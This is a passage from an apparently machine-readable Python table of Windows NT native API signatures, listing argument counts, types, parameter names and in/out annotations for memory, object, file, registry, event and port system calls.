'Buffer', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReadVirtualMemory': (5, ['HANDLE', 'PVOID', 'PVOID', 'ULONG', 'PULONG'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'NumberOfBytesToRead', 'NumberOfBytesReaded'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtUnlockVirtualMemory': (4, ['HANDLE', 'PVOID', 'PULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'NumberOfBytesToUnlock', 'LockType'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT', '__IN']), 'NtWriteVirtualMemory': (5, ['HANDLE', 'PVOID', 'PVOID', 'ULONG', 'PULONG'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'NumberOfBytesToWrite', 'NumberOfBytesWritten'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT_opt']), 'NtQuerySecurityObject': (5, ['HANDLE', 'SECURITY_INFORMATION', 'PSECURITY_DESCRIPTOR', 'ULONG', 'PULONG'], ['ObjectHandle', 'SecurityInformationClass', 'DescriptorBuffer', 'DescriptorBufferLength', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtSetSecurityObject': (3, ['HANDLE', 'SECURITY_INFORMATION', 'PSECURITY_DESCRIPTOR'], ['ObjectHandle', 'SecurityInformationClass', 'DescriptorBuffer'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtDuplicateObject': (7, ['HANDLE', 'PHANDLE', 'HANDLE', 'PHANDLE', 'ACCESS_MASK', 'BOOLEAN', 'ULONG'], ['SourceProcessHandle', 'SourceHandle', 'TargetProcessHandle', 'TargetHandle', 'DesiredAccess', 'InheritHandle', 'Options'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN_opt', '__IN', '__IN']), 'NtMakeTemporaryObject': (1, ['HANDLE'], ['ObjectHandle'], 'NTSTATUS', ['__IN']), 'NtQueryObject': (5, ['HANDLE', 'OBJECT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['ObjectHandle', 'ObjectInformationClass', 'ObjectInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtSetInformationObject': (4, ['HANDLE', 'OBJECT_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['ObjectHandle', 'ObjectInformationClass', 'ObjectInformation', 'Length'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSignalAndWaitForSingleObject': (4, ['HANDLE', 'HANDLE', 'BOOLEAN', 'PLARGE_INTEGER'], ['ObjectToSignal', 'WaitableObject', 'Alertable', 'Time'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt']), 'NtWaitForMultipleObjects': (5, ['ULONG', 'PHANDLE', 'OBJECT_WAIT_TYPE', 'BOOLEAN', 'PLARGE_INTEGER'], ['ObjectCount', 'ObjectsArray', 'WaitType', 'Alertable', 'TimeOut'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN_opt']), 'NtWaitForSingleObject': (3, ['HANDLE', 'BOOLEAN', 'PLARGE_INTEGER'], ['ObjectHandle', 'Alertable', 'TimeOut'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt']), 'NtCreateDebugObject': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'BOOLEAN'], ['DebugObjectHandle', 'DesiredAccess', 'ObjectAttributes', 'KillProcessOnExit'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtDebugActiveProcess': (2, ['HANDLE', 'HANDLE'], ['ProcessHandle', 'DebugObjectHandle'], 'NTSTATUS', ['__IN', '__IN']), 'NtRemoveProcessDebug': (2, ['HANDLE', 'HANDLE'], ['ProcessHandle', 'DebugObjectHandle'], 'NTSTATUS', ['__IN', '__IN']), 'NtCreateDirectoryObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['DirectoryHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtOpenDirectoryObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['DirectoryObjectHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQueryDirectoryObject': (7, ['HANDLE', 'POBJDIR_INFORMATION', 'ULONG', 'BOOLEAN', 'BOOLEAN', 'PULONG', 'PULONG'], ['DirectoryObjectHandle', 'DirObjInformation', 'BufferLength', 'GetNextIndex', 'IgnoreInputIndex', 'ObjectIndex', 'DataWritten'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN', '__IN_OUT', '__OUT_opt']), 'NtClearEvent': (1, ['HANDLE'], ['EventHandle'], 'NTSTATUS', ['__IN']), 'NtCreateEvent': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'EVENT_TYPE', 'BOOLEAN'], ['EventHandle', 'DesiredAccess', 'ObjectAttributes', 'EventType', 'InitialState'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN']), 'NtOpenEvent': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['EventHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtPulseEvent': (2, ['HANDLE', 'PLONG'], ['EventHandle', 'PreviousState'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtQueryEvent': (5, ['HANDLE', 'EVENT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['EventHandle', 'EventInformationClass', 'EventInformation', 'EventInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtResetEvent': (2, ['HANDLE', 'PLONG'], ['EventHandle', 'PreviousState'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtSetEvent': (2, ['HANDLE', 'PLONG'], ['EventHandle', 'PreviousState'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtSetEventBoostPriority': (1, ['HANDLE'], ['EventHandle'], 'NTSTATUS', ['__IN']), 'NtCreateEventPair': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['EventPairHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt']), 'NtOpenEventPair': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['EventPairHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtSetHighEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtSetHighWaitLowEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtSetHighWaitLowThread': (0, [], [], 'NTSTATUS', []), 'NtSetLowEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtSetLowWaitHighEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtSetLowWaitHighThread': (0, [], [], 'NTSTATUS', []), 'NtWaitHighEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtWaitLowEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtCancelIoFile': (2, ['HANDLE', 'PIO_STATUS_BLOCK'], ['FileHandle', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__OUT']), 'NtCreateFile': (11, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'AllocationSize', 'FileAttributes', 'ShareAccess', 'CreateDisposition', 'CreateOptions', 'EaBuffer', 'EaLength'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtCreateMailslotFile': (8, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'ULONG', 'ULONG', 'ULONG', 'PLARGE_INTEGER'], ['MailslotFileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'CreateOptions', 'MailslotQuota', 'MaxMessageSize', 'ReadTimeOut'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN', '__IN', '__IN', '__IN']), 'NtCreateNamedPipeFile': (14, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'ULONG', 'ULONG', 'ULONG', 'BOOLEAN', 'BOOLEAN', 'BOOLEAN', 'ULONG', 'ULONG', 'ULONG', 'PLARGE_INTEGER'], ['NamedPipeFileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'ShareAccess', 'CreateDisposition', 'CreateOptions', 'WriteModeMessage', 'ReadModeMessage', 'NonBlocking', 'MaxInstances', 'InBufferSize', 'OutBufferSize', 'DefaultTimeOut'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtCreatePagingFile': (4, ['PUNICODE_STRING', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'PLARGE_INTEGER'], ['PageFileName', 'MiniumSize', 'MaxiumSize', 'ActualSize'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT_opt']), 'NtDeleteFile': (1, ['POBJECT_ATTRIBUTES'], ['ObjectAttributes'], 'NTSTATUS', ['__IN']), 'NtDeviceIoControlFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'IoControlCode', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN']), 'NtFlushBuffersFile': (2, ['HANDLE', 'PIO_STATUS_BLOCK'], ['FileHandle', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__OUT']), 'NtFsControlFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FsControlCode', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN']), 'NtLockFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'PULONG', 'BOOLEAN', 'BOOLEAN'], ['FileHandle', 'LockGrantedEvent', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'ByteOffset', 'Length', 'Key', 'ReturnImmediately', 'ExclusiveLock'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtNotifyChangeDirectoryFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'ULONG', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'BufferSize', 'CompletionFilter', 'WatchTree'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN']), 'NtOpenFile': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'ULONG', 'ULONG'], ['FileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'ShareAccess', 'OpenOptions'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN', '__IN']), 'NtQueryAttributesFile': (2, ['POBJECT_ATTRIBUTES', 'PFILE_BASIC_INFORMATION'], ['ObjectAttributes', 'FileAttributes'], 'NTSTATUS', ['__IN', '__OUT']), 'NtQueryDirectoryFile': (11, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS', 'BOOLEAN', 'PUNICODE_STRING', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass', 'ReturnSingleEntry', 'FileMask', 'RestartScan'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtQueryEaFile': (9, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'BOOLEAN', 'PVOID', 'ULONG', 'PULONG', 'BOOLEAN'], ['FileHandle', 'IoStatusBlock', 'Buffer', 'Length', 'ReturnSingleEntry', 'EaList', 'EaListLength', 'EaIndex', 'RestartScan'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN', '__IN_opt', '__IN', '__IN_opt', '__IN']), 'NtQueryFullAttributesFile': (2, ['POBJECT_ATTRIBUTES', 'PVOID'], ['ObjectAttributes', 'Attributes'], 'NTSTATUS', ['__IN', '__OUT']), 'NtQueryInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtQueryOleDirectoryFile': (11, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS', 'BOOLEAN', 'PUNICODE_STRING', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass', 'ReturnSingleEntry', 'FileMask', 'RestartScan'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtQueryVolumeInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FS_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileSystemInformation', 'Length', 'FileSystemInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtReadFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN_opt', '__IN_opt']), 'NtReadFileScatter': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'FILE_SEGMENT_ELEMENT', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'SegmentArray', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtSetEaFile': (4, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG'], ['FileHandle', 'IoStatusBlock', 'EaBuffer', 'EaBufferSize'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN']), 'NtSetInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtSetVolumeInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FS_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileSystemInformation', 'Length', 'FileSystemInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtUnlockFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'IoStatusBlock', 'ByteOffset', 'Length', 'Key'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtWriteFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN_opt', '__IN_opt']), 'NtWriteFileGather': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'FILE_SEGMENT_ELEMENT', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'SegmentArray', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtCreateIoCompletion': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['IoCompletionHandle', 'DesiredAccess', 'ObjectAttributes', 'NumberOfConcurrentThreads'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtOpenIoCompletion': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['IoCompletionHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQueryIoCompletion': (5, ['HANDLE', 'IO_COMPLETION_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['IoCompletionHandle', 'InformationClass', 'IoCompletionInformation', 'InformationBufferLength', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtRemoveIoCompletion': (5, ['HANDLE', 'PULONG', 'PULONG', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER'], ['IoCompletionHandle', 'CompletionKey', 'CompletionValue', 'IoStatusBlock', 'Timeout'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__OUT', '__IN_opt']), 'NtSetIoCompletion': (5, ['HANDLE', 'ULONG', 'PIO_STATUS_BLOCK', 'NTSTATUS', 'ULONG'], ['IoCompletionHandle', 'CompletionKey', 'IoStatusBlock', 'CompletionStatus', 'NumberOfBytesTransfered'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__IN']), 'NtCompactKeys': (2, ['ULONG', 'HANDLE'], ['NrOfKeys', 'KeysArray[]'], 'NTSTATUS', ['__IN', '__IN']), 'NtCompressKey': (1, ['HANDLE'], ['Key'], 'NTSTATUS', ['__IN']), 'NtCreateKey': (7, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'PUNICODE_STRING', 'ULONG', 'PULONG'], ['pKeyHandle', 'DesiredAccess', 'ObjectAttributes', 'TitleIndex', 'Class', 'CreateOptions', 'Disposition'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN', '__OUT_opt']), 'NtDeleteKey': (1, ['HANDLE'], ['KeyHandle'], 'NTSTATUS', ['__IN']), 'NtDeleteValueKey': (2, ['HANDLE', 'PUNICODE_STRING'], ['KeyHandle', 'ValueName'], 'NTSTATUS', ['__IN', '__IN']), 'NtEnumerateKey': (6, ['HANDLE', 'ULONG', 'KEY_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'Index', 'KeyInformationClass', 'KeyInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtEnumerateValueKey': (6, ['HANDLE', 'ULONG', 'KEY_VALUE_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'Index', 'KeyValueInformation', 'KeyValueInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtFlushKey': (1, ['HANDLE'], ['KeyHandle'], 'NTSTATUS', ['__IN']), 'NtLoadKey': (2, ['POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES'], ['DestinationKeyName', 'HiveFileName'], 'NTSTATUS', ['__IN', '__IN']), 'NtLoadKey2': (3, ['POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'ULONG'], ['DestinationKeyName', 'HiveFileName', 'Flags'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtNotifyChangeKey': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'BOOLEAN', 'PVOID', 'ULONG', 'BOOLEAN'], ['KeyHandle', 'EventHandle', 'ApcRoutine', 'ApcRoutineContext', 'IoStatusBlock', 'NotifyFilter', 'WatchSubtree', 'RegChangesDataBuffer', 'RegChangesDataBufferLength', 'Asynchronous'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__OUT', '__IN', '__IN']), 'NtOpenKey': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['pKeyHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQueryKey': (5, ['HANDLE', 'KEY_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'KeyInformationClass', 'KeyInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtQueryMultipleValueKey': (6, ['HANDLE', 'PKEY_MULTIPLE_VALUE_INFORMATION', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'ValuesList', 'NumberOfValues', 'DataBuffer', 'BufferLength', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN', '__OUT', '__IN_OUT', '__OUT_opt']), 'NtQueryValueKey': (6, ['HANDLE', 'PUNICODE_STRING', 'KEY_VALUE_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'ValueName', 'KeyValueInformationClass', 'KeyValueInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtReplaceKey': (3, ['POBJECT_ATTRIBUTES', 'HANDLE', 'POBJECT_ATTRIBUTES'], ['NewHiveFileName', 'KeyHandle', 'BackupHiveFileName'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtRestoreKey': (3, ['HANDLE', 'HANDLE', 'ULONG'], ['KeyHandle', 'FileHandle', 'RestoreOption'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSaveKey': (2, ['HANDLE', 'HANDLE'], ['KeyHandle', 'FileHandle'], 'NTSTATUS', ['__IN', '__IN']), 'NtSetInformationKey': (4, ['HANDLE', 'KEY_SET_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['KeyHandle', 'InformationClass', 'KeyInformationData', 'DataLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSetValueKey': (6, ['HANDLE', 'PUNICODE_STRING', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['KeyHandle', 'ValueName', 'TitleIndex', 'Type', 'Data', 'DataSize'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__IN', '__IN']), 'NtUnloadKey': (1, ['POBJECT_ATTRIBUTES'], ['DestinationKeyName'], 'NTSTATUS', ['__IN']), 'RtlFormatCurrentUserKeyPath': (1, ['PUNICODE_STRING'], ['RegistryPath'], 'NTSTATUS', ['__OUT']), 'NtCreateKeyedEvent': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['KeyedEventHandle', 'DesiredAccess', 'ObjectAttributes', 'Reserved'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtReleaseKeyedEvent': (4, ['HANDLE', 'PVOID', 'BOOLEAN', 'PLARGE_INTEGER'], ['KeyedEventHandle', 'Key', 'Alertable', 'Timeout'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt']), 'NtWaitForKeyedEvent': (4, ['HANDLE', 'PVOID', 'BOOLEAN', 'PLARGE_INTEGER'], ['KeyedEventHandle', 'Key', 'Alertable', 'Timeout'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt']), 'NtCreateMutant': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'BOOLEAN'], ['MutantHandle', 'DesiredAccess', 'ObjectAttributes', 'InitialOwner'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtOpenMutant': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['MutantHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQueryMutant': (5, ['HANDLE', 'MUTANT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['MutantHandle', 'MutantInformationClass', 'MutantInformation', 'MutantInformationLength', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReleaseMutant': (2, ['HANDLE', 'PLONG'], ['MutantHandle', 'PreviousCount'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtAcceptConnectPort': (6, ['PHANDLE', 'HANDLE', 'PLPC_MESSAGE', 'BOOLEAN', 'PLPC_SECTION_OWNER_MEMORY', 'PLPC_SECTION_MEMORY'], ['ServerPortHandle', 'AlternativeReceivePortHandle', 'ConnectionReply', 'AcceptConnection', 'ServerSharedMemory', 'ClientSharedMemory'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN', '__IN', '__IN_OUT_opt', '__OUT_opt']), 'NtCompleteConnectPort': (1, ['HANDLE'], ['PortHandle'], 'NTSTATUS', ['__IN']), 'NtConnectPort': (8, ['PHANDLE', 'PUNICODE_STRING', 'PSECURITY_QUALITY_OF_SERVICE', 'PLPC_SECTION_OWNER_MEMORY', 'PLPC_SECTION_MEMORY', 'PULONG', 'PVOID', 'PULONG'], ['ClientPortHandle', 'ServerPortName', 'SecurityQos', 'ClientSharedMemory', 'ServerSharedMemory', 'MaximumMessageLength', 'ConnectionInfo', 'ConnectionInfoLength'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN_OUT_opt', '__OUT_opt', '__OUT_opt', '__IN_opt', '__IN_opt']), 'NtCreatePort': (5, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'ULONG', 'ULONG', 'PULONG'], ['PortHandle', 'ObjectAttributes', 'MaxConnectInfoLength', 'MaxDataLength', 'Reserved'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_OUT_opt']), 'NtImpersonateClientOfPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'Request'], 'NTSTATUS', ['__IN', '__IN']), 'NtListenPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'ConnectionRequest'], 'NTSTATUS', ['__IN', '__OUT']), 'NtQueryInformationPort': (5, ['HANDLE', 'PORT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['PortHandle', 'PortInformationClass', 'PortInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReadRequestData': (6, ['HANDLE', 'PLPC_MESSAGE', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['PortHandle', 'Request', 'DataIndex', 'Buffer', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReplyPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'Reply'], 'NTSTATUS', ['__IN', '__IN']), 'NtReplyWaitReceivePort': (4, ['HANDLE', 